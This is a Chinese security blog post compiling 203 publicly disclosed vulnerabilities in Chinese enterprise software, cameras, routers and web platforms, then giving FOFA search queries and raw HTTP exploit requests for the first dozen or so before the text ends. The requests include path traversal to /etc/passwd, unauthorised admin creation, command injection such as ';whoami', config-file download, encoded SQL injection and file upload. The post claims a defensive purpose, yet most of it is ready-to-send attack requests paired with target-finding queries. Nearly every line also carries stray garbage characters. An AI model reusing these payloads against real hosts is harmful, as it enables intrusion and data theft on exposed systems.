互联网公开漏洞整理202309-202406% K4 V. m* H v& S# O7 k' r6 z) x
道一安全 2024-06-05 07:41 北京! S; z) ]" [) g/ V T0 O9 E' c
以下文章来源于网络安全新视界 ,作者网络安全新视界1 i; d/ h3 k; u- s
- K% d9 @ B/ f: D5 ^- ]
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
6 G$ c# \% w3 c! J, {
5 o) Q }0 \" b J* d; L漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。; ^) w$ N# f0 C7 h/ W' J3 r4 J
0 g( {7 Z+ W2 D4 d0 t) g8 l l安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。2 a2 [7 `7 s% T) J
- M2 T' C* ^, }$ w! }文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
; p5 C& g# P& _3 O! ?& o$ f1 C! B9 X& |: x) [& N. E9 x$ ]
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。: d* \7 y( T+ N6 ~
0 }6 a8 X, d/ h& \5 g) j% r
1 h( m5 w0 `1 C" d: b5 c* r+ ]声明
* g2 y1 e' m% Y$ `& H6 e# T- b
' @6 o! E4 P3 d- N4 p7 O1 H为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
$ [3 \" Q* {2 j4 U) Q# Y% e
7 Q' ?8 F6 Z; S) i有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。$ ~" v) `8 ~" r' e/ E$ t
% U% ~) ~/ l& T) P. m: P
2 O6 h6 l3 V8 D& |) p
' m% y8 R5 z# F# A3 e" S' m目录
3 k' B: ? d6 }. b! ~) I9 |" l
6 T# w# f" K: W6 ?% Q; g1 `01+ ?1 t2 `3 a, ?9 E2 ` O' P; n9 U- e
3 U3 }! H0 h% g, f' |' z9 k
1. StarRocks MPP数据库未授权访问
) P, c; K* E% ^5 M, @" {, d7 H. B2. Casdoor系统static任意文件读取. X. M/ K m& U i% a6 ^
3. EasyCVR智能边缘网关 userlist 信息泄漏
# @* X$ F- H6 G; w4. EasyCVR视频管理平台存在任意用户添加( W5 @2 ~0 D% k6 n. |9 c9 m
5. NUUO NVR 视频存储管理设备远程命令执行7 e) Q0 A, r4 x, u' K
6. 深信服 NGAF 任意文件读取8 E, k3 @- R4 G3 f& z
7. 鸿运主动安全监控云平台任意文件下载: t U+ s3 M6 ^( e: d
8. 斐讯 Phicomm 路由器RCE
0 o2 b& N5 t6 Z( `2 v4 K ~3 \9. 稻壳CMS keyword 未授权SQL注入0 v6 T& Y: j. l
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传! Z* X2 E& z/ p* p! ?* y
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入% M. M2 o; X- z5 z% G. Y$ L
12. Jorani < 1.0.2 远程命令执行; w/ H8 z1 j7 p0 G) r5 E/ g
13. 红帆iOffice ioFileDown任意文件读取
& g3 C5 h! ?: I7 B1 q8 `" H14. 华夏ERP(jshERP)敏感信息泄露
, X, y" r# z, G, U15. 华夏ERP getAllList信息泄露
0 r% \7 A, [* S( u6 J16. 红帆HFOffice医微云SQL注入
4 T, `) O' {* v/ A9 r' I% Z, u17. 大华 DSS itcBulletin SQL 注入
2 w& L7 l9 K2 y# j9 Q: A& m% k @, ?18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
% d; N f4 C; w. @& ~5 _9 Y19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入9 _8 x$ w1 P, h1 E; u& l
20. 大华ICC智能物联综合管理平台任意文件读取! g$ q* {. C6 h; P5 ]4 a% U
21. 大华ICC智能物联综合管理平台random远程代码执行
( b$ _0 P( X' A4 d: ?3 Y8 Z22. 大华ICC智能物联综合管理平台 log4j远程代码执行
+ p7 q3 K# P( J" q: T23. 大华ICC智能物联综合管理平台 fastjson远程代码执行4 g5 B& _! ], `
24. 用友NC 6.5 accept.jsp任意文件上传
/ ?7 k$ k5 N7 k+ Z. a4 K" P+ ]25. 用友NC registerServlet JNDI 远程代码执行
6 q" G9 _. Z4 A6 ]: n26. 用友NC linkVoucher SQL注入
7 C. i6 S$ m t% J' |27. 用友 NC showcontent SQL注入
. p' g A/ t# `6 B28. 用友NC grouptemplet 任意文件上传4 s7 a& K7 w; }. |2 e3 R, [
29. 用友NC down/bill SQL注入% X9 T$ V& V4 E. X
30. 用友NC importPml SQL注入
1 b P; n7 ]& u, B1 i5 P31. 用友NC runStateServlet SQL注入
6 y) |% H2 L( p, h32. 用友NC complainbilldetail SQL注入, L( s7 Q: k7 [6 y5 M2 ?! f
33. 用友NC downTax/download SQL注入
. F2 ~# I9 t' }9 B) ]34. 用友NC warningDetailInfo接口SQL注入
/ j5 ]* b# F4 [. s/ `35. 用友NC-Cloud importhttpscer任意文件上传
1 P- Y$ S; y d9 A. H! D8 A& ]2 l4 t36. 用友NC-Cloud soapFormat XXE" {0 S, \* v# ?& o0 }" B( U9 N$ c
37. 用友NC-Cloud IUpdateService XXE
( B# u- Z) p8 [38. 用友U8 Cloud smartweb2.RPC.d XXE( J* m8 [0 H# j1 g5 N
39. 用友U8 Cloud RegisterServlet SQL注入
& |8 B+ F) {; w40. 用友U8-Cloud XChangeServlet XXE" P& ^3 r5 b n( {: R3 r6 ] |
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
3 @2 @$ ^! I9 M' D' p0 \42. 用友GRP-U8 SmartUpload01 文件上传8 D p7 ]# F4 T6 f
43. 用友GRP-U8 userInfoWeb SQL注入致RCE9 }/ w( T+ u8 y7 s0 C
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
8 p; v( Y! @+ x' S45. 用友GRP-U8 ufgovbank XXE
6 N* @% D# c( I. K5 e, G9 W46. 用友GRP-U8 sqcxIndex.jsp SQL注入) G! N* c, l3 F1 J' \# d, i
47. 用友GRP A++Cloud 政府财务云 任意文件读取: i- R- z0 X% |7 ?
48. 用友U8 CRM swfupload 任意文件上传8 F+ H/ n2 t4 {0 `9 k K( G3 n
49. 用友U8 CRM系统uploadfile.php接口任意文件上传, M5 Q2 M5 @$ E; Q; x' D
50. QDocs Smart School 6.4.1 filterRecords SQL注入
0 o* ^ _$ s/ N6 }2 ?% H51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入. K7 m3 k u4 s- D3 d. X( c
52. 泛微E-Office json_common.php sql注入6 D* D/ E& x; g& {
53. 迪普 DPTech VPN Service 任意文件上传
5 C, P" T1 K7 }/ l# @ v54. 畅捷通T+ getstorewarehousebystore 远程代码执行
4 q, q! z: X* y. {5 r1 L55. 畅捷通T+ getdecallusers信息泄露
. e% H: g) M2 u- }+ i56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
2 s: V2 e. x. }% o* k5 ^( |57. 畅捷通T+ keyEdit.aspx SQL注入
9 D; ~. ^4 w8 ^( {# }% g6 V58. 畅捷通T+ KeyInfoList.aspx sql注入
2 j# o1 H2 P4 D$ \/ i3 A59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行 O5 a Q) I6 y
60. 百卓Smart管理平台 importexport.php SQL注入( C2 y2 @8 q- _
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
) z. U- w( F1 X5 b9 @! q4 j% ^$ ?9 \62. IP-guard WebServer 远程命令执行- J6 f8 P) ~2 @9 T* \$ i
63. IP-guard WebServer任意文件读取
) K# x/ P4 Z( Q5 J64. 捷诚管理信息系统CWSFinanceCommon SQL注入
6 E! q+ \6 @% v" q65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过9 N* D$ E# ^, c
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
; g1 d+ i6 \" [67. 万户ezOFFICE wpsservlet任意文件上传- t, r$ j' z4 h. l
68. 万户ezOFFICE wf_printnum.jsp SQL注入* L( a! r, _# R* G
69. 万户 ezOFFICE contract_gd.jsp SQL注入& }7 t; d* P1 ?: t' H7 t& f; }. ?
70. 万户ezEIP success 命令执行
: V- Y% v4 `: A9 @71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
% `2 i0 n* t' e4 N72. 致远OA getAjaxDataServlet XXE
9 p0 H6 m$ p) [( }; M: D73. GeoServer wms远程代码执行2 q/ ]# L+ p# f7 O* n F
74. 致远M3-server 6_1sp1 反序列化RCE
6 y. L: G1 t& n/ u# g4 u6 ?75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE- Z/ S' C/ c1 n. Y- Q" @7 x
76. 新开普掌上校园服务管理平台service.action远程命令执行* C& n( D' O, M. P& M# v2 `
77. F22服装管理软件系统UploadHandler.ashx任意文件上传+ f; h# [9 l+ B* e% q" L
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传% d9 E: e1 ]! g) D T ?% J6 Q
79. BYTEVALUE 百为流控路由器远程命令执行
, B; G4 Y! Y! D) {7 M80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传" ?5 u8 e) ?+ I& b7 q& N- m8 \: m
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
3 }( N$ N3 l% U' Y+ x5 O" h7 O82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行3 C7 L$ a2 I' i3 h( f: |
83. JeecgBoot testConnection 远程命令执行7 q. @! Y6 B! Z# H7 q
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
. f5 r* e8 Y! j6 Y$ @, K85. SysAid On-premise< 23.3.36远程代码执行' M" I+ @2 e U: q: e
86. 日本tosei自助洗衣机RCE1 q3 z. ~' z9 b5 n
87. 安恒明御安全网关aaa_local_web_preview文件上传) [1 Z) L* I* h
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
7 U) p6 f5 g3 Q6 m( Q& R6 O8 e89. 致远互联FE协作办公平台editflow_manager存在sql注入
8 o! C7 l- [) D$ ?) P: K4 d2 A90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行% b7 k+ ?% w& R9 e7 E/ I
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取# }, W7 W- \8 r
92. 海康威视运行管理中心session命令执行
0 u/ q- C6 s' k2 K# M: B93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传- l$ p$ U( i6 E& z
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
: ^* E% u0 i$ u; k! j. ?- F% G. s, \95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行$ q8 E9 z" M1 g: Q+ ~& H3 f
96. Apache OFBiz 18.12.11 groovy 远程代码执行
3 \# D0 I6 v& h. t/ ~+ D9 A! z9 x97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行 U: r: g) J0 w4 B8 r
98. SpiderFlow爬虫平台远程命令执行0 z& {% V |8 L1 O+ H
99. Ncast盈可视高清智能录播系统busiFacade RCE
# t# ~ H; {' E" ^/ c# g( I100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
5 P' V, E6 H5 e ~& y3 \& c101. ivanti policy secure-22.6命令注入 \! [% C, A8 ]; w# [! l4 r8 v, m6 E
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行4 n, K: k0 V9 \9 }% z1 U) x
103. Ivanti Pulse Connect Secure VPN XXE
. v, A* s d( R- u3 p104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露2 R3 e# o0 u, u0 t6 z7 P8 `& O
105. SpringBlade v3.2.0 export-user SQL 注入
, b. y, K2 s; ~$ E106. SpringBlade dict-biz/list SQL 注入
: ^: \% v) V3 Y107. SpringBlade tenant/list SQL 注入
+ U& ^' J! R* Q: g108. D-Tale 3.9.0 SSRF% ], D- ~* G9 A0 {3 i: t
109. Jenkins CLI 任意文件读取+ K- P( @9 t8 Q) p; }8 X% G
110. Goanywhere MFT 未授权创建管理员5 z3 n: C' v- c4 k+ b
111. WordPress Plugin HTML5 Video Player SQL注入
# G: R3 n3 f; z5 p112. WordPress Plugin NotificationX SQL 注入8 T; a% h. {& ~! @( r- |
113. WordPress Automatic 插件任意文件下载和SSRF
/ }* z' V3 d% V# p: d; ]% @* B114. WordPress MasterStudy LMS插件 SQL注入6 n+ A+ ^4 O( ?& E+ S% M+ W
115. WordPress Bricks Builder <= 1.9.6 RCE' s9 k- G; ]- F& N2 \3 I' o3 ^
116. wordpress js-support-ticket文件上传
& w0 ]1 ~# b, ~. [2 C3 i5 W3 [. S0 @117. WordPress LayerSlider插件SQL注入3 y( K" m2 ?7 R t; f5 A* l7 ]8 T7 L7 j
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
! p# s0 F; H# D; i ?: o% Q, A119. 北京百绰智能S20后台sysmanageajax.php sql注入
: v& i2 m8 h9 J3 r5 K/ \120. 北京百绰智能S40管理平台导入web.php任意文件上传
0 v& |. n8 ]: W& B/ h121. 北京百绰智能S42管理平台userattestation.php任意文件上传
, C' H e1 c# C% V1 M122. 北京百绰智能s200管理平台/importexport.php sql注入
" q# p7 E* U' c. Z/ m& x: m123. Atlassian Confluence 模板注入代码执行
! ^' Z8 W0 ^9 w9 t" o: a8 m124. 湖南建研工程质量检测系统任意文件上传1 l; l8 T; P* k l% q6 s
125. ConnectWise ScreenConnect身份验证绕过; @* D* @! N+ F$ t2 a
126. Aiohttp 路径遍历
: h+ }4 G9 ]. F* Y9 `8 }$ }127. 广联达Linkworks DataExchange.ashx XXE' u. u2 I( K. j, A
128. Adobe ColdFusion 反序列化
6 ^4 f$ y( ?2 ]0 B/ w& x, p129. Adobe ColdFusion 任意文件读取
- f- a9 o9 d ~3 S. L130. Laykefu客服系统任意文件上传: G l! o& C; u2 z8 W
131. Mini-Tmall <=20231017 SQL注入
. H; a9 h" X8 @( K132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过+ }0 T4 I/ N! T# d6 V) J
133. H5 云商城 file.php 文件上传! L% z2 F& g2 }2 `" p6 E+ x
134. 网康NS-ASG应用安全网关index.php sql注入, I: c* B4 d2 j$ k/ k
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
8 P# e" h; v0 C( K' U2 h# j6 o136. NextChat cors SSRF) X: i; ? ~" l) _7 h
137. 福建科立迅通信指挥调度平台down_file.php sql注入
9 f1 e2 m8 l/ R* ?- t1 y138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
4 ~2 Y5 z* V. D139. 福建科立讯通信指挥调度平台editemedia.php sql注入
1 q& S) e- V: L- M5 d- I. z140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
% s% |8 m% T9 ^( j; q: d$ g141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入4 s1 ?1 ]4 e' X
142. CMSV6车辆监控平台系统中存在弱密码# }' E3 E1 L- U/ s; g' {
143. Netis WF2780 v2.1.40144 远程命令执行9 ^/ D2 }. o' U; y. \
144. D-Link nas_sharing.cgi 命令注入. Q, |) ]; o" [2 Z
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
: Q* S7 p) G* m6 n. E9 E146. MajorDoMo thumb.php 未授权远程代码执行4 X# V7 W# X9 m! [" W
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历- _$ e5 I% Y _) O/ e% q8 q
148. CrushFTP 认证绕过模板注入; ~% y7 ?/ w) ^; g- Z/ O5 K6 m- a' v
149. AJ-Report开源数据大屏存在远程命令执行* R; a' |& i/ [" b: ]" O
150. AJ-Report 1.4.0 认证绕过与远程代码执行, t0 x2 ~( I3 K6 _8 B' v
151. AJ-Report 1.4.1 pageList sql注入
4 ^( |5 X. c8 B, e1 C0 ]7 ~152. Progress Kemp LoadMaster 远程命令执行
+ q# |4 L$ ` Z( e0 r$ T; `153. gradio任意文件读取; h& b. l# G4 v! @; u
154. 天维尔消防救援作战调度平台 SQL注入" G6 C( w" w0 V, \$ ?1 O
155. 六零导航页 file.php 任意文件上传
8 w( C2 Q# |& \* ]: M" C156. TBK DVR-4104/DVR-4216 操作系统命令注入# q$ L, G' T3 d' N1 A: S( s
157. 美特CRM upload.jsp 任意文件上传1 X/ i0 W7 A8 B2 c4 ~& [. L
158. Mura-CMS-processAsyncObject存在SQL注入
2 L( B I- q" c+ [2 [1 V* p159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传- }7 R: \! m$ n [$ M3 T- U4 E
160. Sonatype Nexus Repository 3目录遍历与文件读取 J2 U& ?% T* o5 P( X. r; {. A
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传+ F, B7 I& s* V5 ]9 D
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传2 A! I3 o+ G9 |
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传. T) U. T' W2 y6 G! s& h. n0 X
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
) U2 R- p/ m8 x1 v165. OrangeHRM 3.3.3 SQL 注入2 s! w+ ?, i; ^% V
166. 中成科信票务管理平台SeatMapHandler SQL注入
2 n% U: |5 ?% {0 C# b3 k; j* p167. 精益价值管理系统 DownLoad.aspx任意文件读取6 @4 a# @4 Y* s8 G4 Q' ~' r
168. 宏景EHR OutputCode 任意文件读取/ ~6 M$ U h2 y) X
169. 宏景EHR downlawbase SQL注入2 V$ O* q4 } W: ?! q3 P
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
/ x; ]$ Q9 v9 U5 R8 X9 [171. 通天星CMSV6车载定位监控平台 SQL注入, E- s p( N4 a* I% l
172. DT-高清车牌识别摄像机任意文件读取4 d1 O* r$ Q$ A5 R( i7 z: f3 u4 B
173. Check Point 安全网关任意文件读取8 K% w: _+ @) f2 j
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
7 u7 i/ O3 M r2 P' a4 \175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
2 f' X) y- r# h( P' D9 M7 }176. 电信网关配置管理系统 rewrite.php 文件上传# Z0 d( r: n% ?9 B( R5 @
177. H3C路由器敏感信息泄露
5 c* i4 H1 J5 G% q178. H3C校园网自助服务系统-flexfileupload-任意文件上传' G& A6 B ~* f; ]* G. A
179. 建文工程管理系统存在任意文件读取
# r- V( ?. \3 R- V" f# X6 q180. 帮管客 CRM jiliyu SQL注入3 M& ?, c8 w# D( g9 w2 X
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入; t6 w5 l. I: L: ]# C$ L
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
* q1 T) j' l$ w1 O1 ^ M0 K7 b0 e183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入+ P* Q$ s/ V- B# a3 R
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加7 B% @/ [# z f' F) V: \
185. 瑞友天翼应用虚拟化系统SQL注入. o" }% `; b) W* X5 k* \) ~' K
186. F-logic DataCube3 SQL注入
% H* r+ G# v, y) m% B( Z* L187. Mura CMS processAsyncObject SQL注入
1 }& u- w& W# T: G188. 叁体-佳会视频会议 attachment 任意文件读取0 O3 g& d N; D* X8 [! G
189. 蓝网科技临床浏览系统 deleteStudy SQL注入& u8 _2 R. _6 B
190. 短视频矩阵营销系统 poihuoqu 任意文件读取' x- F1 m1 E( \# m
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入# o0 D$ m- R9 B8 X" Z* p. c4 T
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
( H7 K' w9 ?/ E' p6 M9 v193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
/ l+ F1 J; [ g$ @+ z( I194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
4 U; A1 ?5 U- L# O4 W195. 飞鱼星上网行为管理系统 send_order.cgi命令执行7 s, |& J( E* Q0 I+ E
196. 河南省风速科技统一认证平台密码重置$ Y4 y# y, z* G7 b
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入 i" N& x# n r8 b7 C& e, W
198. 阿里云盘 WebDAV 命令注入; T+ Z5 m/ M& d* X+ u! l. y
199. cockpit系统assetsmanager_upload接口 文件上传
( j% Y) }; }9 F200. SeaCMS海洋影视管理系统dmku SQL注入
0 p% |' ^ @3 g201. 方正全媒体新闻采编系统 binary SQL注入
% ~/ E. B9 B3 _/ b1 M9 W202. 微擎系统 AccountEdit任意文件上传
6 L* N4 Q$ r7 O; T: v7 c203. 红海云EHR PtFjk 文件上传0 `8 n' s8 d9 {0 [- a3 Q
! S& j8 K* X) w. c, a
POC列表1 j( s9 g$ F" i+ W$ x
; P$ X$ O! o+ V02* G' |9 f, |5 j! J3 p* L, X
; i: | Y/ S1 q0 u1. StarRocks MPP数据库未授权访问5 U' J' p( ^2 \% d8 O: |' U( A
FOFA :title="StarRocks"
" t% T" |, ?3 [4 x8 vGET /mem_tracker HTTP/1.1
* ^ t( _2 R/ ~) b; |Host: URL
3 Y7 s* P9 x; w5 p4 Z& g2 y
8 W& E! C* s7 u* ^' `6 E1 n2 F" D, g% j& M
2. Casdoor系统static任意文件读取
! J& c; R7 N3 s/ z' N2 hFOFA :title="Casdoor"0 f& S0 C- Z, h% i0 }9 D6 L3 E/ ~
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.12 F% W' h! P) c1 u. H+ P
Host: xx.xx.xx.xx:9999
3 O: D: a1 I9 gUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.368 L! n9 W" x; P9 n1 R( z6 B
Connection: close
' D: q) Y/ M& y' B2 l$ l* sAccept: */*
/ R# E8 k9 Z: l2 p& s% m$ jAccept-Language: en
- U* m5 @7 Q. H! w8 ]. L2 CAccept-Encoding: gzip
" F6 F( a9 H3 J! |: C" }( I9 d8 P {
, I& \3 G. d M6 B: T3. EasyCVR智能边缘网关 userlist 信息泄漏9 B- L% ^+ B- ?; L3 _! e
FOFA :title="EasyCVR"
5 \, Y8 B. g! y, PGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
7 g; v$ L( Y# b& R/ PHost: xx.xx.xx.xx
4 n. h. x8 H$ V ]) Q' ^
) [8 H7 G a; e% @ g0 P4 h) F9 T2 D- E9 V1 M. h
4. EasyCVR视频管理平台存在任意用户添加* H2 A. G2 N" d# {0 O
FOFA :title="EasyCVR"+ z x' v0 r. L
& [/ _4 p* d9 D+ G1 L0 n4 _5 epassword更改为自己的密码md5/ S. V/ m& R6 \9 F$ Q$ {
POST /api/v1/adduser HTTP/1.1
) V! }- U) d h6 U( l! vHost: your-ip8 ~ P9 n6 J9 u' X7 Q% S3 P
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
& Q# H% z- s5 h
: a% _; c5 e0 k* `4 B& |, Mname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=16 V; _$ l! m. U0 l z- o5 {/ [
( q6 z4 e# y! Q& B* O
9 u! [/ f% z( M5. NUUO NVR 视频存储管理设备远程命令执行1 n, y0 h5 i9 D/ N
FOFA:title="Network Video Recorder Login"
) P8 {3 s' R. k* vGET /__debugging_center_utils___.php?log=;whoami HTTP/1.10 H- R0 ?/ e$ ^/ q3 U
Host: xx.xx.xx.xx- B- L# @$ l) D' v& M
0 {, P' |/ S4 w" b* |; v
) [7 ?# {, [8 y5 Z6. 深信服 NGAF 任意文件读取5 Z0 `% n& j8 r4 ~4 I. w
FOFA:title="SANGFOR | NGAF"
& E: K/ e& W6 j) wGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1& n8 _2 D$ N% H) h0 z
Host:, j5 w' e6 } I5 _+ H; q3 C
% t4 N' ~2 C; Q1 C/ \% _7 i5 R6 T0 F: u, w. @
7. 鸿运主动安全监控云平台任意文件下载$ @2 _& ?+ ?. m8 n8 ]
FOFA:body="./open/webApi.html"
; _* }; C( [7 o$ B+ ZGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
R+ }$ x) m8 E& B6 Q g _Host:
: i+ o- Q0 T, z) y8 t- n
3 d0 t) T% E- z/ l
/ @" G. L: U) t( t5 P9 n8. 斐讯 Phicomm 路由器RCE
( h5 t1 q: d1 ]FOFA:icon_hash="-1344736688"
- {8 D( w# k! m$ w9 s3 n# D2 o默认账号admin登录后台后,执行操作
L' R9 Z ~0 _. M: ~POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1) i4 }5 ?0 `7 B
Host: x.x.x.x
) F# _6 u8 Z% f0 \& s5 {Cookie: sysauth=第一步登录获取的cookie
9 L) ^) @0 [% B0 o4 [7 x4 NContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
a/ Q2 V! G8 |; xUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36' w2 l. {4 J% t% I0 x4 I
! X2 r8 I+ w. ?( ^, {2 Q
------WebKitFormBoundaryxbgjoytz7 h ], C# e8 Y! h
Content-Disposition: form-data; name="wifiRebootEnablestatus"
2 e: k ]4 n0 r) L& S; p, {5 ~2 I( I: K9 P. z3 N( b) n( v9 c
%s" j8 ?, V3 l* z6 t
------WebKitFormBoundaryxbgjoytz2 O. L4 `- q- L# _1 ]6 n9 C0 _5 B
Content-Disposition: form-data; name="wifiRebootrange"& _! J% G7 F4 r0 z, ?/ A
$ [3 [$ A+ _6 y! O; E2 Z% h8 V12:00; id;
! w9 e% v$ @; S------WebKitFormBoundaryxbgjoytz
6 L4 m; k( z, V9 G! a6 v2 lContent-Disposition: form-data; name="wifiRebootendrange"7 E$ {* H' g3 h( W
3 L" ^; ~' r' [, @- i$ Q0 [& W%s:
5 ~& z: `7 K& a" B/ Y------WebKitFormBoundaryxbgjoytz
3 A; j. o! f8 p. `Content-Disposition: form-data; name="cururl2"# G2 S, Z8 w6 H0 Q/ e
& _9 D5 D% y* C. b- E
3 q/ F( p% C: X------WebKitFormBoundaryxbgjoytz--
( U& x' F; L, w4 m* M+ b3 n6 e9 F( z8 |0 f4 ]
) j8 h7 ~. z& X( o) ]! p3 w
9. 稻壳CMS keyword 未授权SQL注入+ l6 P3 Z B/ k6 m2 ]
FOFA:app="Doccms"
7 G- J; \6 Q. g: b, GGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1* Y. [ n T! A" Q5 } v
Host: x.x.x.x# o5 p! S! {' g: L9 U
* S) i( u7 D& _# x5 i; L$ q. ~5 f2 v* s: X) }4 c1 O# v r0 j0 \. J
payload为下列语句的二次Url编码! t1 \/ V+ {6 C; w
' F3 B$ z! L; Z2 X( T' o* a
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#$ V$ {) l: @1 f+ ?/ u3 r7 N
1 b8 t" \4 x5 V0 u10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
* X" F- c' n, I$ \$ BFOFA:icon_hash="953405444". i, X5 E. h9 ^0 P i8 ^6 ~& G
6 u8 |# I% S9 \) K
文件上传后响应中包含上传文件的路径' U5 X/ ^- V0 d$ S
POST /eis/service/api.aspx?action=saveImg HTTP/1.1' w) A0 f! N8 `* m: b0 g ]" \
Host: x.x.x.x:xx" @1 D( \$ {' U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36/ G& j) Z0 V5 w* w. O# H+ W
Content-Length: 1974 l7 T6 V. l+ v- h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9$ F: e* z. x- d( v, I1 T& B
Accept-Encoding: gzip, deflate
& Y! m% X: ]4 b9 pAccept-Language: zh-CN,zh;q=0.9
# r+ d6 B; L* {; S+ fConnection: close+ s( z! H6 a0 O0 {& F
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
7 ~; x: @" D+ J, `6 W5 H# Z5 q+ ~* U6 a# g! `$ U" a9 c: F0 |1 ~
------WebKitFormBoundaryxdgaqmqu
% ?1 K2 K4 e+ [7 w5 \Content-Disposition: form-data; name="file"filename="icfitnya.txt"
! d( Z A5 d& T; }' VContent-Type: text/html
) Q8 d, ^. Q5 h+ H& A x; N
) B8 M8 D) o6 [- X/ E- xjmnqjfdsupxgfidopeixbgsxbf/ ?/ N* s. [% P3 j4 ~5 h5 J
------WebKitFormBoundaryxdgaqmqu--4 D7 S9 n4 k9 @0 {& j! e/ A# ?, J1 {
" Y) U3 @! P9 R7 {
! n- B6 A: s& q: `1 J11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
* W1 |2 Z- l, ]; XFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"4 c2 @9 Q/ J4 |3 S
